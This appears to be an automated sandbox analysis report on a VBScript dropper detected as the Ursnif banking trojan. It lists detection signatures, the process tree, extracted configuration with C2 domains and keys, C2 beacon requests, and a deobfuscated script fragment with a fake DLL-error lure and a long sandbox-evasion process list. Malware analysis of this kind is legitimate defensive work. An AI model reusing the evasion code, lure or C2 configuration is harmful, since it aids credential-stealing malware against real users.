
Windows Analysis Report start[2021.09.09_15-26].vbs

Overview

General Information

Sample Name: start[2021.09.09_15-26].vbs
Analysis ID: 481181
MD5: 3959f76d91c30f3c14916f80a6c4cf23
SHA1: 2c918bff7f9073762308af3876777afc8507e3a8
SHA256: 1d02060d7493d25e46e7cdf76fc05aa6c80493f40db75d48700f1eb17431191d

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Deletes itself after installation
Writes registry values via WMI
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3840 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 1304 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 2396 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 5236 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • WmiPrvSE.exe (PID: 1848 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000017.00000003.577173150.0000000000B30000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for submitted file
Source: start[2021.09.09_15-26].vbs | Virustotal: Detection: 10%
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/ | Avira URL Cloud: Label: malware
Source: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 | Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT | Avira URL Cloud: Label: malware
Source: http://pop.bigbigpoppa.com/ | Avira URL Cloud: Label: malware
Source: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c | Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: pop.urlovedstuff.com | Virustotal: Detection: 8%
Source: atl.bigbigpoppa.com | Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\fum.cpp | ReversingLabs: Detection: 13%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.555373535.00000262C5114000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000002.735989389.0000000070374000.00000002.00020000.sdmp, fum.cpp.0.dr
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7034AC85 FindFirstFileExW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49789 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49789 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49791 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.251.90.253 80
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: pop.urlovedstuff.com
Source: Joe Sandbox View | ASN Name: SPRINTHOSTRU SPRINTHOSTRU
Source: Joe Sandbox View | IP Address: 185.251.90.253 185.251.90.253
Source: global traffic | HTTP traffic detected: GET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected: GET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: pop.urlovedstuff.com
Source: global traffic | HTTP traffic detected: GET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Sep 2021 11:52:04 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Vary: Accept-Encoding | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmp | String found in binary or memory: http://atl.bigbigpoppa.com/
Source: rundll32.exe, 00000017.00000002.733066508.00000000006D5000.00000004.00000001.sdmp | String found in binary or memory: http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d
Source: rundll32.exe, 00000017.00000003.651548557.00000000006CF000.00000004.00000001.sdmp | String found in binary or memory: http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT
Source: rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmp | String found in binary or memory: http://pop.bigbigpoppa.com/
Source: rundll32.exe, 00000017.00000003.652840050.00000000006D5000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000003.697690406.00000000006D5000.00000004.00000001.sdmp | String found in binary or memory: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c
Source: unknown | DNS traffic detected: queries for: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected: GET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected: GET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: pop.urlovedstuff.com
Source: global traffic | HTTP traffic detected: GET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70332274
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C2725F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C27E30
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C21754
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7033F000
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70348AA5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70354362
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7034D536
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7033F500
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70350770
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70331382 GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_703314FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70331B4A NtMapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70332495 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C240DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C28055 NtQueryVirtualMemory,
Source: start[2021.09.09_15-26].vbs | Initial sample: Strings found which are bigger than 50
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
Source: start[2021.09.09_15-26].vbs | Virustotal: Detection: 10%
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'
Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: classification engine | Classification label: mal100.troj.evad.winVBS@7/2@4/1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C22102 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: start[2021.09.09_15-26].vbs | Static file information: File size 1393062 > 1048576
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.555373535.00000262C5114000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000002.735989389.0000000070374000.00000002.00020000.sdmp, fum.cpp.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = 
Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70332210 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70332263 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C27AB0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_00C27E1F push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70357A3C push ds; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7035922C push edi; ret
